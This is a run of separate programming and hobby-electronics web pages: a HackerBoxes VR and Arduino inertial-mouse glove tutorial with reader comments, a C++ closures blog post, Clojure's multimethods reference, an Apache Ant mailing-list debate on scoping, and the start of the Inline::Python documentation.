Virtual Worlds: This month, HackerBox Hackers are exploring Virtual Reality technology. This Instructable contains information for working with HackerBoxes #0009. If you would like to receive a box like this right to your mailbox each month, just subscribe at HackerBoxes.com and join the revolution!

Topics and Learning Objectives for this HackerBox:
- Understand and Define Virtual Reality (VR)
- Work with VR Headsets
- Experience VR Software
- Explore Bluetooth Communications
- Interface and Program ATmega32U4 Microcontrollers
- Interface an Inertial Measurement Unit (IMU)
- Implement an Inertial Mouse Control Device using an IMU
- Configure the Inertial Mouse into a VR Glove
- Work with the HC-05 Bluetooth Module

HackerBoxes is the monthly subscription box service for DIY electronics and computer technology. We are hobbyists, makers, and experimenters. Hack the Planet!

Step 1: HackerBoxes #0009: Box Contents
- HackerBox #0009 Collectible Reference Card
- VR Smartphone Headset
- Bluetooth Gamepad Controller
- USB Bluetooth Adapter CSR 4.0
- Arduino Pro Micro with ATmega32U4
- HC-05 Bluetooth Module
- MPU-92/65 Inertial Motion Sensor Module
- Green Prototype PCB (4x6 cm)
- Pair of Waterproof Gloves
- Two Micro Buttons
- Two Pairs of Velcro Tabs (16x45 mm)
- DuPont Jumpers 20cm F-F
- HackerBoxes Decal
- Exclusive DARKNET Decal

Some other things that will be helpful:
- Soldering Tools
- Smartphone
- Computer with Arduino IDE
- Glue gun or epoxy

Most importantly, you will need a sense of adventure, DIY spirit, and hacker curiosity. Some of these VR technologies are still fairly cutting edge and will work differently depending upon what type of computer or smartphone you are using. This type of hobby electronics isn't always easy, but when you persist and enjoy the adventure, a great deal of satisfaction may be derived from overcoming the frustration and making things work!
Step 2: Welcome to Virtual Reality

Virtual reality (VR), also known as immersive multimedia or computer-simulated reality, is a computer technology that replicates an environment, real or imagined, and simulates a user's physical presence and environment to allow for user interaction. Virtual realities may be displayed on either a computer monitor or through a virtual reality headset (also called a head-mounted display). Some simulations include additional sensory information and focus on real sound through speakers or headphones targeted towards the user. Advanced haptic systems may include tactile information, generally known as force feedback. VR may include remote communication environments which provide virtual presence of users with the concepts of telepresence and telexistence, either through the use of standard input devices such as a keyboard and mouse, or through multimodal devices such as a wired glove or omnidirectional treadmills. An immersive virtual environment can be similar to the real world in order to create a lifelike experience (for example, in simulations for pilot or combat training), or it may differ significantly from reality, such as in VR games. (from Virtual Reality)

Here is a nice overview entitled, "Explained: How does VR actually work?"

VR was all the rage at CES 2016. For example, the author of this TIME article reports, "I Finally Tried Virtual Reality and It Brought Me to Tears." For further (much further) details, check out this MOOC and accompanying free textbook from Computer Science Professor Steven M. LaValle at UIUC.

Step 3: VR Headgear for Smartphones

Google Cardboard introduced the world to easily-accessible, low-cost virtual reality by leveraging smartphone technology for processing and display. A simple mobile application is launched on the smartphone, and the smartphone is then placed into the viewer (also known as the headset). The smartphone display is split into left and right stereoscopic components.
When viewed through the lenses of the headset, the two images are fused into one image with depth for a three-dimensional effect. While Google Cardboard was named for the original fold-out cardboard viewers supplied by Google and others, applicable headsets are no longer limited to those made of cardboard. The nicer plastic variety, such as those seen here, work the same way but are much more durable and comfortable to use.

Install the Google Cardboard mobile application on your smartphone and give it a try. If your smartphone is running Android, some applications may be controlled by the Bluetooth Gamepad Controller. The original cardboard versions of the smartphone headsets had magnetic switches. Sadly, the nicer ones do not. In some instances, the Bluetooth Gamepad can be used for triggering inputs. There are some interesting hacks to be found for adding the button functionality, such as this one using a simple magnet.

Google's VR offerings will not be ending with Cardboard. Google Daydream was announced at I/O 2016. Here is the Keynote. There was a very nice presentation at Google I/O 2016 on Designing with Daydream if you are interested in some of the nuanced considerations for designing VR apps and media.

Step 4: Virtual Reality Software

Once you have played with the Google Cardboard App a bit, try some others...

YouTube (Android and iOS): check out "The best 360 degree and VR videos on YouTube"
Within VR (formerly Vrse) (Android and iOS)
Roller-Coaster (Android and iOS)

Of course you can find many, many more by searching for "VR" under Apps in the Apple iOS App Store or the Google Play Store for Android. This project is quite creative and shows some interesting examples of head tracking (using Free Track), display mirroring (using Splashtop), and game controller support (using Keysticks).

Step 5: Bluetooth Wireless Technology

Bluetooth is a wireless technology standard for exchanging data over short distances.
It uses short-wavelength UHF radio waves in the ISM band around 2.4 GHz. This presentation on Bluetooth Basics has a lot of history and details on Bluetooth technology.

The Miniature Bluetooth Gamepad can be used as an input device on computers and certain tablets and smartphones. (Newer non-rooted iOS devices do not support this type of interface.) The HC-05 Bluetooth Module can be easily interfaced to a microcontroller platform (such as an Arduino board) as presented later in this Instructable. The USB Bluetooth Adapter is based on a CSR 4.0 USB interface that may be used on your PC if it did not come with Bluetooth. Note that the CSR chipset is not supported by certain OSX versions, but Mac laptops generally provide built-in Bluetooth support.

Step 6: Arduino Pro Micro 5V/16MHz

Step 7: Inertial Measurement Unit (IMU) Module

The Inertial Measurement Unit (IMU) is based on a MPU-9250. The MPU-9250 is a second generation 9-axis MotionTracking device comprising a 3-Axis Gyroscope, 3-Axis Accelerometer, and a 3-Axis Magnetometer. The schematic shown here demonstrates how to wire up the Arduino Pro Micro and the MPU-9250 to create an Inertial Mouse. One mouse button is also added.

This project (with video) includes an Arduino library for the MPU-9250 and also has some example code to start with for our inertial mouse:
- copy the code as shown
- remove (comment out) all reference to the right button
- change the left button pin to pin 4 (or whichever pin you used)
- change pinMode for leftbutton from OUTPUT to INPUT_PULLUP
- reverse the active level for leftstate

As wired here (as opposed to in the example code), the button signal is active low since it is pulled up when released and grounded when the button is pressed.

if (leftstate == LOW) { // grounded when pressed
    Serial.print(" Left Click! ");
    Mouse.press(MOUSE_LEFT);
}
if (leftstate == HIGH) { // pulled up when not pressed
    Mouse.release(MOUSE_LEFT);
}

Step 8: Virtual Reality Glove

Once you test out the Inertial Mouse, you can mount it to the Prototyping PCB (optional) or to a piece of cardboard (optional) and then use the provided velcro tabs to adhere it to the back of a glove. The "mouse button" can be affixed to a fingertip using hot glue (or epoxy) so that it can be pressed using the thumb while operating the Inertial Mouse.

Step 9: HC-05 Bluetooth Module

The Bluetooth Module (HC-05) can easily be used in place of the serial monitor interface. For example, get any sketch running on the Arduino that uses serial communications. Do not wire up the HC-05 Bluetooth module yet. From the start, set the data rate to 9600 bps. That is the default for the HC-05, so this just makes it easier to transition later. Get the program running on the Arduino and working with the serial monitor on your computer (make sure to set the computer serial rate to 9600 as well or it will not work). Now you can disconnect the computer (or just turn the IDE and serial monitor off if you still need it for power) and wire up the HC-05. Now Bluetooth is taking the place of the serial monitor. Sync your mobile device's Bluetooth radio to the HC-05 and run an app like BlueTerm on the mobile device. This will let you type to the serial port from the mobile device just as you did from the Arduino serial monitor, but this time, you are wireless. As an advanced option, if you want to be able to leave pins 0 and 1 connected to the PC (via the USB interface), you can modify whatever sketch you are working with to use SoftwareSerial and wire the HC-05 rx and tx lines onto two other pins. Check out this Virtual Reality Skateboard example using a Bluetooth interface.

Step 10: Hack the Planet

We hope you are enjoying your time working with Virtual Worlds.
If you enjoyed this Instructable and would like to have a box like this delivered right to your mailbox each month, please join us by SUBSCRIBING HERE. Please share your success in the comments below and/or on the HackerBoxes Facebook page. Certainly let us know if you have any questions or need some help with anything. Thank you for being part of the HackerBoxes adventure. Please keep your suggestions and feedback coming. HackerBoxes are YOUR boxes. Let's make something great!

My quick attempt with the Google Cardboard app and my Nexus 5 leads me to believe that the Bluetooth joy pad doesn't work to "select" in the app, though I have seen a few websites that say similar devices can be made to work. I did grab a magnet and waved it around my phone to manage selection. For those that don't know, the actual Google Cardboard devices had a "switch" that was made with a magnet trapped in the layers of cardboard. The phone's magnetometer will pick up the movement. If anyone has a better way to use the Google Cardboard app and these goggles, please let me know. In addition we should list apps that can successfully be used. I did fire up Shadowrun VR using the goggles and joy pad.

Did anyone get the bluetooth gamepad to work with an android phone and the cardboard app?
I understand the Arduino's inputs will tolerate this variance but I think it is bad practice to infer that all devices will interoperate between 3.3v and 5v levels. I actually walked around the house plugging this thing into various computers just to see if it worked. It did. Hello, This is my first box, and I am struggling with the Bluetooth section, I have used two different Windows computers and can't communicate over serial with the device. I can pair with the HC-05, but the serial port associated with it is always "busy" it also looks like the device disconnects instantaneously. What information do you need to point me in theright direction? If you're trying to use the arduino serial monitor that may not work for the bluetooth connection. Try downloading tera term or putty to interact with the bluetooth serial port. Also make sure your arduino code is using Serial1 and not just Serial for all the Serial1.begin, Serial1.read, and Serial1.write commands. Serial through the built in usb connection, Serial1 for an addon module using the Tx/Rx pins. Thank You, I have tried Putty to the same result. I even tried controlling just the bluetooth adapter using the Blinkies sketch from and saw the same kind of port busy message. I have wired up the adapter both with and without a voltage divider on the bluetooth RX pin. I have even tried powering the bluetooth adapter off of a separate 5 V supply, I always seem to get the same response. (I even purchased a new adapter from amazon thinking I had fried the RX pin with 5V.) It's like windows doesn't know what to do with the device and stops communicating. I wondered if it was windows 10, but my windows 7 machine is the same, except I don't get ports that are clearly attached to the bluetooth adapter. Again, Thanks for the quick reply. When I was struggling with basic bluetooth communication I went with a very simple echo program so I could see the back and forth data flow. 
I'd recommend loading up the below code to your arduino, then connect via putty to the outgoing com port showing up in the bluetooth port details: void setup() { Serial1.begin(9600); Serial1.println("Type Something and press enter"); } void loop() { while(Serial1.available()==0) {} Serial1.println(""); Serial1.println("You wrote:"); while(Serial1.available()>0) { Serial1.write(Serial1.read()); } Serial1.println(""); } Ok sorry for your difficulties , this is probably a silly question but have ensured that your arduino IDE serial monitor is not running ? I think you are going to have have to chase your problem down through the device manager . The fact that it pairs is a good thing and means the hardware is talking just fine, so none of the voltages or hardware crap is interfering. That leaves things in the protocol realm or device enumerator / blue tooth enumerator and type , I am using the bluetooth term from the windows app store ( freebie ) , putty is good but this app specifically looks for the bluetooth device ports. Good luck post your progress Here's the completion of my inertial mouse from this month's box. I did get bluetooth communication working between the arduino and mu computer but I abandoned getting the glove to work via bluetooth and I explain why in the video. A couple things I may adjust in the future. Take a look at the BLE libraries , you will find some wonderful things like BLEmouse .move commands and so forth. Did you get it to work with those libraries? I took a cursory look, I don't think this gets around the fundamental problem....that windows doesn't see this device as a human interface device(HID). The BLE seems to just change how it communicates, it doesn't maintain an open communication channel just sends data when there's data to send. If you've had success with this I'd be very interested, but I don't think I'll pursue that with the info I've read about it so far. 
If you load the BLE library using the Arduino IDE , then go select Examples from the file menu , near the bottom of the list will be BLEPeripheral , when you mouse over it a drop down list will show with HID mouse over it and you will find an example called HID_joystick_mouse This example code will run if you change the board specific references ...... If you are not comfortable writing the code flag me and I'll code up an example for you when I get a little time Cheers ! There is another way to get it to work remotely without having to buy a $25+ HID Bluetooth module and without a listener program on the computer. This solution would require 2 arduino devices and 2 Bluetooth modules. The idea would have one arduino, the motion tracker, and a Bluetooth module in slave mode on the glove powered by a battery. The arduino would feed the motion tracker and button info to the bluetooth and that's it. Then connect the other Bluetooth module in master mode to another arduino plugged into the computer. We know that the Pro Micro is recognized as a human interface device by windows, so this should work fine. This module will read the input from the Bluetooth, parse the data and send mouse commands to the computer. This would turn the arduino into a Bluetooth receiver for your machine emulating a HID so you wouldn't need the little Bluetooth receiver for you computer. Extra components beyond what was in the hackerbox: - Bluetooth module - either another HC05(master or slave) or an HC06(slave only) - Arduino, probably something like the pro mini or micro - batteries. For the extra arduino you could use the pro-mini that came in box 0008 for the glove since it only needs to communicate via Bluetooth. If I were to buy another arduino specifically for this I would purchase the 3.3V arduino pro mini since that would require less weight for the batteries to supply that voltage. That voltage works fine for all the components on the glove. 
Note the Box 0008 came with the 5V version of that board, so you'll want a 6V or 9V battery for that one. The zipper came off my glove the first time I zipped. Love the monthly boxes. I connected the HC-05 to the Arduino. But what code do I need to make it actually recognize it? Also, is anyone else having the issue that it disconnects the Bluetooth after a few seconds? Hey all you PC challenged (i.e. Mac OS X) people out there. Has anyone had any luck getting the HC-05 to communicate with their Mac Computer? I'm using El Capitan. So far I can connect via Bluetooth and the HC-05 tty port shows up in the terminal, but I've had no luck with moving data back and forth. I also suspect that the iPhone is a lost cause. Any detailed advice would be appreciated. The data piece may be as mentioned below replace all serial in the sketch with serial1 then recompile you should start seeing data Indeed. Replacing Serial1 for Serial doest the trick! SoftwareSerial does not seem to work with the Arduino Pro Micro. Okay here's an update the sketch won't start sending data over bluetooth till you do a find and replace Serial with Serial1 . I set up a terminal to watch the bluetooth data flow and had nothing till I recompiled with the Serial1, Still if you power this circuit separately from the computer the mouse will not work but you will still see the data flowing across the serial link. I downloaded a free bluetooth terminal programmer from the app store ( WIN 10 ) to troubleshoot with. I used the default microsoft bluetooth mgr. to Pair the HC05 and then the app found and connected fine. I though I had this beat when I saw the position data flowing and the mouse cursor moving as I moved the board ..... but then I noticed if I unplugged and ran off a straight power only USB connector the mouse would no longer work , the data for the serial did still flow. This must have something to do with the way the Mouse.h lib defines the port .... 
Someone didn't do a very good job of really checking this code out. Oh well let you know when I figure it out. So I'm finding out not that iOS doesn't support the HC-05 bt profile. Am I mistaken? Yep that's what I see , I can pair up fine to my Razer Tablet windows 10 but my iPhone won't even discover it. Has anyone else had trouble getting the glove mouse to click? It might be the button, but I'm not sure. Has anyone had this problem to? Yeah having same issue , haven't done much to look into it yet though Mine ended up being wiring all good now I'm going to try to change the wiring from pin 4 to ground to pin 4 to pin 5. I'll set pin 5 as an output and pin 4 as an input. I'll do it tom most likely. a little primitive but it works whoo hoo!!!!!!!! thanks all for you help> cam someone please help me to find an answer to my problem, on the mouse project I built it I went to the project reference downloaded the code and edited it as stated in reference but every time I went to compile I get an error that states 'Mouse" not found. Does your Sketch include the line #include <mouse.h>"? which I see it does I don't have a lot of programing experience so I am lost I tried for two days to find an answer on the internet with no luck. 
thanks // Watch video here: //Connection pins provided in the diagram at the beginning of video // library provided and code based on: #include "Wire.h" #include "I2Cdev.h" #include "MPU9250.h" #include <Mouse.h> // specific I2C addresses may be passed as a parameter here // AD0 low = 0x68 (default for InvenSense evaluation board) // AD0 high = 0x69 MPU9250 accelgyro; I2Cdev I2C_M; int16_t ax, ay, az; int16_t gx, gy, gz; int16_t mx, my, mz; float Axyz[3]; int leftbutton = 4; void setup() { // join I2C bus (I2Cdev library doesn't do this automatically) Wire.begin(); Serial.begin(9600); Serial.println("Initializing I2C devices..."); accelgyro.initialize(); Serial.println("Testing device connections..."); Serial.println(accelgyro.testConnection() ? "MPU9250 connection successful" : "MPU9250 connection failed"); delay(1000); pinMode(leftbutton, INPUT_PULLUP); Mouse.begin(); } void loop() { getAccel_Data(); float pitchrad = atan(Axyz[0] / sqrt(Axyz[1] * Axyz[1] + Axyz[2] * Axyz[2])); // radians float rollrad = atan(Axyz[1] / sqrt(Axyz[0] * Axyz[0] + Axyz[2] * Axyz[2])); // radians float rolldeg = 180 * (atan(Axyz[1] / sqrt(Axyz[0] * Axyz[0] + Axyz[2] * Axyz[2]))) / PI; // degrees float pitchdeg = 180 * (atan(Axyz[0] / sqrt(Axyz[1] * Axyz[1] + Axyz[2] * Axyz[2]))) / PI; // degrees float Min = -15;//-30, -45, -15 float Max = 15;// 30, 45, 15 int mapX = map(pitchdeg, Min, Max, -6, 6); int mapY = map(rolldeg, Min, Max, -6, 6); Mouse.move(-mapX, mapY, 0); Serial.print(pitchdeg); Serial.print(","); Serial.print(rolldeg); Serial.print(" - "); int leftstate = digitalRead(leftbutton); //Serial.print(leftstate); Serial.print(rightstate); if (leftstate == Low) { Serial.print(" Left Click! 
"); Mouse.press(MOUSE_LEFT); } if (leftstate == High) { Mouse.release(MOUSE_LEFT); } Serial.println(); } void getAccel_Data(void) { accelgyro.getMotion9(&ax, &ay, &az, &gx, &gy, &gz, &mx, &my, &mz); Axyz[0] = ((double) ax / 256) - 1.6; Axyz[1] = ((double) ay / 256) - 2.1; Axyz[2] = (double) az / 256; } Did you unpack the zip file into your arduino libraries folder ? Using the IDE to add it to the same ? When you go to that folder mouse.h should show up there .... probably you did but worth checking the location Also ccarrella I did copy exactly your code from your message and compiled it the only error was the states for the mouse button , they should be in all CAPS as in HIGH and LOW , other than that it compiled and ran on my board. Good Luck thank you so much I will correct the high low text and try unzipping that file much appreciated ok update I have the code compileing now but here is the problem when it goes to uypload it to the board I hear it disconnect and re connect it starts on port 5 then when it reconnects it goes to port 6 and then errors out telling me there is no board on port 6 any ideas would help out greatly thanks Try setting the the board type in the IDE to Leonardo disconnect the usb first , change the board type and reconnect , then compile and upload. yup I got it working thanks I would like to thank everyone for your help I am a little rusty at this stuff Okey dokey , I definitely Bric'd da micro ... Sparkfun was good but confusing in places to follow. I finally just gave up and dug out my adafruit usbtiny. Soldered the header pins on the micro and stuck it in a breadboard , used the jumpers to pick up ISP connections to the USBtiny and selected programmer in the Arduino IDE and ran Bootloader , it burned fine My micro is restored If you are going to much with these Pro Micro's I'd suggest buying the USBtiny programmer which normally I use to load AVR programs. 
This month's documentation on how to use the box contents was pretty inadequate, I have to say.

So are there iOS apps that work with this Bluetooth remote? I can't believe that you'd ship a solution that only works with Android.

It may only work for Android, though. It works fine on my Galaxy S5.

Solution found: Start it up and pair, then turn the controller off. Hold X and Start to turn it on again; when turned on this way, it defaults to MOUSE mode. The analog stick moves the cursor, and the Start button is a click (or double click), which WORKS with the Cardboard apps.

I've got the inertial mouse working on a breadboard. I've been trying to get the Bluetooth working with this breadboard, but I'm a little afraid I damaged the module: the Bluetooth runs on 3.3V, and the Tx line from the Arduino is 5V. I didn't read that until later. It pairs with my computer just fine, but I don't see anything coming from the serial monitor. I recently tried setting up a voltage divider on the Tx line to drop it down to around 3.3V, but that didn't seem to have any effect. Next I'm going to take it all apart and just try talking to the Bluetooth without the motion controller or any mouse functions. Stay tuned for that video.

I like this hack. He just drills a hole so he can touch the screen. Easy!

I have gotten my Bluetooth controller to pair up fine with my iPhone 6s, but all the key functions in both "game" and "key" modes don't actually seem to work in the Google Cardboard app, or in any of the games I have downloaded.

I just opened mine up. I got the select button working with a magnet on the camera side of my iPhone 6s. I really hope I can get a remote option like the gloves working as a selector; the magnet just seems too low-tech and imprecise for me. I was much more impressed than I thought I would be just from the demo in the Cardboard app. I'm very happy with this box; it made me a little bit giddy when I opened it.
I uploaded a video of my unboxing, check it out. I plan on doing another video for the glove project once I've got that done... success or failure.

Mine came today. OMG! I didn't even know I wanted one of these!! Can't wait to start.
http://www.instructables.com/id/HackerBoxes-0009-Virtual-Worlds/
Introduction

In C++, a lambda expression constructs a closure, an unnamed function object capable of capturing variables in scope. That still sounds ambiguous, at least to me. Closure is a general concept in programming that originated from functional programming. When we talk about closures in C++, they always come with lambda expressions. In this blog post, we will take a look at an example of a C++ lambda expression and closure, learn the difference between a lambda expression and a closure, and understand the concepts.

Lambda Expression VS Closure

The difference between the concepts of a lambda expression and a closure is sometimes confusing, since lambda expressions and closures are talked about together all the time. Scott Meyers has a good explanation of this using analogies.

Examples

/*
 * closure.cpp
 */
#include <iostream>
#include <functional>

std::function<void(void)> closureWrapper1()
{
    int x = 10;
    return [x](){std::cout << "Value in the closure: " << x << std::endl;};
}

std::function<void(void)> closureWrapper2()
{
    int x = 10;
    return [&x](){x += 1; std::cout << "Value in the closure: " << x << std::endl;};
}

int main()
{
    int x = 10;
    auto func0 = [&x](){x += 1; std::cout << "Value in the closure: " << x << std::endl;};
    std::function<void(void)> func1 = closureWrapper1();
    std::function<void(void)> func2 = closureWrapper2();
    func0();
    func0();
    func0();
    std::cout << "-------------------------" << std::endl;
    func1();
    func1();
    func1();
    std::cout << "-------------------------" << std::endl;
    func2();
    func2();
    func2();
}

To compile the program, please run the following command in the terminal.

$ g++ closure.cpp -o closure --std=c++11

The outputs are as follows on my computer.
$ ./closure
Value in the closure: 11
Value in the closure: 12
Value in the closure: 13
-------------------------
Value in the closure: 10
Value in the closure: 10
Value in the closure: 10
-------------------------
Value in the closure: 32765
Value in the closure: 32766
Value in the closure: 32767

In the above example, func1 and func2 are not closures. Instead, they are std::function wrapper objects that wrap closures. func0 is a closure, but strictly speaking it is a copy of the closure created by the lambda expression [&x](){x += 1; std::cout << "Value in the closure: " << x << std::endl;}.

In func0, we captured a reference to the variable x in the scope of main. Therefore, every time we call func0, the value of x in the scope of main is increased by 1.

In func1, we captured the value of the variable x in the scope of closureWrapper1 by making a copy of it. Therefore, every time we call func1, the value printed by the closure is always 10. Note that after returning from an ordinary function, the local variables in that function go out of scope.

In func2, we captured a reference to the variable x in the scope of closureWrapper2. The reference "remembers" the address of x. However, after returning from the function, the local variable x goes out of scope, so the value read through the reference is undefined.

Closure Analogs

Function Object (Functor)

A function object overloads operator(). It can capture values by making copies of variables into its member variables. The shortcoming is that for each different function call, regardless of how simple it is, we would have to implement a new class, whereas implementing a lambda expression is faster.

Functions Using Static Variables

We don't actually like to use static variables in functions, unless it is extremely necessary, because they would confuse the readers.
In addition, if you have a lot of function calls, it is likely that you will have a lot of static variables, which is even more undesirable.

FAQs

Is a Function Object a Closure?

No. According to the definition of a closure, "In programming languages, a closure, also lexical closure or function closure, is a technique for implementing lexically scoped name binding in a language with first-class functions". As C++ does not allow defining named functions inside a function, a function object does not (always) allow lexical scoping, where, with lexical scope, a name always refers to its (more or less) local lexical environment. In our case, the x in the closure always has to be mapped to the x in the local scope. In a function object, the member variables are different from the local variables outside the function object, even though they might have the same name. This might look like a lexical scoping exception for function objects in C++.

#include <iostream>
#include <functional>

double pi = 3.1415926;

class CircleArea
{
public:
    CircleArea()
    {
    }

    double operator() (double r) const
    {
        return pi * r * r;
    }
};

int main()
{
    double r = 1.0;
    CircleArea circleArea;
    double area = circleArea(r);
    std::cout << area << std::endl;
}

However, because we are not allowed to define a class in all the other scopes, classes are not considered to support lexical scoping. The only nested functions allowed in C++ are lambda expressions.

Conclusion

When we talk about closures in C++, we are basically referring to the objects that lambda expressions construct.
https://leimao.github.io/blog/CPP-Closure/
Clojure eschews the traditional object-oriented approach of creating a new data type for each new situation, instead preferring to build a large library of functions on a small set of types. However, Clojure fully recognizes the value of runtime polymorphism in enabling flexible and extensible system architecture.

Clojure supports sophisticated runtime polymorphism through a multimethod system that supports dispatching on types, values, attributes and metadata of, and relationships between, one or more arguments.

A Clojure multimethod is a combination of a dispatching function and one or more methods. When a multimethod is defined, using defmulti, a dispatching function must be supplied. This function will be applied to the arguments to the multimethod in order to produce a dispatching value. The multimethod will then try to find the method associated with the dispatching value or a value from which the dispatching value is derived. If one has been defined (via defmethod), it will then be called with the arguments, and that will be the value of the multimethod call. If no method is associated with the dispatching value, the multimethod will look for a method associated with the default dispatching value (which defaults to :default), and will use that if present. Otherwise the call is an error.

derive creates these relationships, and the isa? function tests for their existence. Note that isa? is not instance?.

You can define hierarchical relationships with (derive child parent). Child and parent can be either symbols or keywords, and must be namespace-qualified. Note the :: reader syntax; ::keywords resolve in the current namespace: ::rect -> :user/rect

(derive ::rect ::shape)
(derive ::square ::rect)

parents / ancestors / descendants and isa? let you query the hierarchy:

(parents ::rect)
-> #{:user/shape}

(ancestors ::square)
-> #{:user/rect :user/shape}

(descendants ::shape)
-> #{:user/rect :user/square}

(= x y) implies (isa? x y):

(isa? 42 42)
-> true

isa?
uses the hierarchy system:

(isa? ::square ::shape)
-> true

You can also use a class as the child (but not the parent; the only way to make something the child of a class is via Java inheritance). This allows you to superimpose new taxonomies on the existing Java class hierarchy:

(derive java.util.Map ::collection)
(derive java.util.Collection ::collection)

(isa? java.util.HashMap ::collection)
-> true

(isa? String Object)
-> true

as do parents / ancestors (but not descendants, since class descendants are an open set):

(ancestors java.util.ArrayList)
-> #{java.lang.Cloneable java.lang.Object java.util.List
     java.util.Collection java.io.Serializable
     java.util.AbstractCollection java.util.RandomAccess
     java.util.AbstractList}

isa? also works element-wise on vectors:

(isa? [::square ::rect] [::shape ::shape])
-> true

Multimethods use isa? rather than = when testing for dispatch value matches. Note that the first test of isa? is =, so exact matches work.

(defmulti foo class)
(defmethod foo ::collection [c] :a-collection)
(defmethod foo String [s] :a-string)

(foo [])
-> :a-collection

(foo (java.util.HashMap.))
-> :a-collection

(foo "bar")
-> :a-string

prefer-method is used for disambiguating in the case of multiple matches where neither dominates the other. You can just declare, per multimethod, that one dispatch value is preferred over another.

All of the examples above use the global hierarchy used by the multimethod system, but entire independent hierarchies can also be created with make-hierarchy, and all of the above functions can take an optional hierarchy as a first argument.

This simple system is extremely powerful. One way to understand the relationship between Clojure multimethods and traditional Java-style single dispatch is that single dispatch is like a Clojure multimethod whose dispatch function calls getClass on the first argument, and whose methods are associated with those classes.
Clojure multimethods are not hard-wired to class/type; they can be based on any attribute of the arguments, on multiple arguments, can do validation of arguments and route to error-handling methods, etc.

Note: In this example, the keyword :Shape is being used as the dispatch function, as keywords are functions of maps, as described in the Data Structures section.

(defmulti area :Shape)

(defn rect [wd ht] {:Shape :Rect :wd wd :ht ht})
(defn circle [radius] {:Shape :Circle :radius radius})

(defmethod area :Rect [r]
    (* (:wd r) (:ht r)))
(defmethod area :Circle [c]
    (* (. Math PI) (* (:radius c) (:radius c))))
(defmethod area :default [x] :oops)

(def r (rect 4 13))
(def c (circle 12))

(area r)
-> 52

(area c)
-> 452.3893421169302

(area {})
-> :oops
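For readers more at home outside Clojure, the :Shape dispatch above boils down to a table lookup from a dispatch value to a method, with a :default fallback. Here is a hedged Python sketch of that mechanism (an illustration, not part of the Clojure documentation; the names defmethod and area simply mirror the example):

```python
import math

# Minimal re-creation of the area multimethod: dispatch on the
# "Shape" key of a plain dict, falling back to a default method.
methods = {}

def defmethod(dispatch_value):
    """Register a function under a dispatch value."""
    def register(fn):
        methods[dispatch_value] = fn
        return fn
    return register

def area(shape):
    # Look up the method for this dispatch value; fall back to default.
    fn = methods.get(shape.get("Shape"), methods["default"])
    return fn(shape)

@defmethod("Rect")
def _(r):
    return r["wd"] * r["ht"]

@defmethod("Circle")
def _(c):
    return math.pi * c["radius"] ** 2

@defmethod("default")
def _(x):
    return "oops"

print(area({"Shape": "Rect", "wd": 4, "ht": 13}))  # 52
print(area({}))  # oops
```

What this sketch deliberately omits is the isa?-based hierarchy walk: Clojure matches a dispatch value against derived parents, not just by exact lookup.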
https://clojure.org/reference/multimethods
> From: Dominique Devienne [mailto:DDevienne@lgc.com]
>
> > From: Jose Alberto Fernandez [mailto:jalberto@cellectivity.com]
> > > From: Dominique Devienne [mailto:DDevienne@lgc.com]
> > > > From: Stefan Bodewig [mailto:bodewig@apache.org]
>
> > > 1) I don't like the <let> name. Perhaps it shows how ignorant I am
> > > about other languages not in the C family, but it doesn't speak
> > > to me, and the name does not convey the purpose. Thus I'm -1 to
> > > the <let> name. <scope> or <local> or else are not perfect, but
> > > at least convey more meaning to my ignorant self.
> >
> > :-(. <let> comes from mathematics.
>
> Maybe in your part of the world...

Well, the last I checked, in English, when you write a definition, or a proof, or a theorem, or whatever, you usually start with something like: "Let G(V,E) be a graph, and let X be a person trying to understand the concept of a graph. The ability of X to understand what G means is ...." :-)

Now, X is just a moniker; it is not a person. In my next definition X may stand for something else. Very similar to what <let/> does. Now, maybe in a different language you use a different construction. But that is not the point, is it? In any case, the argument is about the concept of defining a name and not a location.

> > That is the reason for using <let>; it is also used in some functional
> > languages.
>
> I thought so. I'm still -1, or at best -0 if I hear more convincing
> arguments.
>
> > The scope is the scope of the attribute notation (i.e., the macrodef).
> > Now you can use this name to create a new property, using <property/>,
> > or for whatever else you please; there are no expectations whatsoever.
>
> I'm not following. I think I understand what a scope is.
> I don't confuse scope with the notation to define explicitly
> what should 'go out of scope' when the explicit scope ends.
>
> I consider running a <macrodef> as starting/entering a new
> scope for names, doing something, then ending/leaving the
> scope, restoring shadowed properties and removing local
> properties, as defined by the propertyset.
>
> > And I have mentioned several times that one could use propertysets
> > to stop things leaking through <antcalls> and such. But you are still
> > thinking only of properties. There are other things that we create
> > dynamically in ANT, like references, scripts, etc.
>
> Not at all. I'm thinking properties and references. What else
> is there? Scripts are scripts, id'd or not. That's still references.
>
> > The main hurdle is that ANT uses a flat namespace for things, and that
> > any part can see any property/reference defined by any other part
> > at any time in the life of the project.
>
> So? As Peter points out, a flat namespace doesn't mean it
> cannot be implemented using a stack of maps per scope,
> similar to the nesting of Properties when you provide a default.
> It's still flat, but uses nested Properties to provide
> correct compartmentalization. This is how <antcall> should have
> been implemented instead of the copying going on right now.

Do not confuse "names" with "namespaces". Names may be flat, but if you have a stack of maps, you definitely do not have a flat namespace. The same applies to "C", and does not apply to Fortran.

> > I know they are very old concepts here, but just as old are the data
> > structures we use in ANT. And on top, the fact that something does not
> > exist is meaningful (i.e., unless). I do not see how you can reconcile
> > all these things. Maybe this should be done as part of ANT 2.0 (joke).
> > And forget about BC,
>
> Sorry, but I still don't see why it can't be made BC... The
> Project API has to be unchanged of course, but the actual
> impl should move to a lighter-weight Context object or
> something that would be stacked correctly, and to which
> Project would delegate.

As long as you do not change the meaning or behavior of <tasks/>, INCLUDING third-party tasks that we cannot go and change. We have a contract with people writing tasks. If we want to break it, we should move to ANT 2.0 and have two development lines.

> Dealing with <parallel> would be tricky, but I think we
> *should* break BC by not allowing the different 'threads' of
> a <parallel> to share properties, at least unless explicitly
> requested.

So what do you do about <waitfor/>? It is there for a reason.

> But that's going into too much detail for now. --DD

The details are what is important here.

Jose Alberto

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@ant.apache.org
For additional commands, e-mail: dev-help@ant.apache.org
http://mail-archives.apache.org/mod_mbox/ant-dev/200410.mbox/%3CF3D701FEF0483B4AAA11A18CE328461B07824B@leeds.cellectivity.com%3E
- NAME
- SYNOPSIS
- DESCRIPTION
- WHAT'S NEW?
- Using the Inline::Python Module
- Exceptions
- Using Perl inside Python (inside Perl)
- Using the PerlPkg Type
- Using the PerlSub Type
- Under the Hood
- The Do-it-yourselfer's Guide to Inline::Python
- SEE ALSO
- BUGS AND DEFICIENCIES
- SUPPORTED PLATFORMS

This document describes Inline::Python, the Perl package which gives you access to a Python interpreter. For lack of a better place to keep it, it also gives you instructions on how to use perlmodule, the Python package which gives you access to the Perl interpreter.

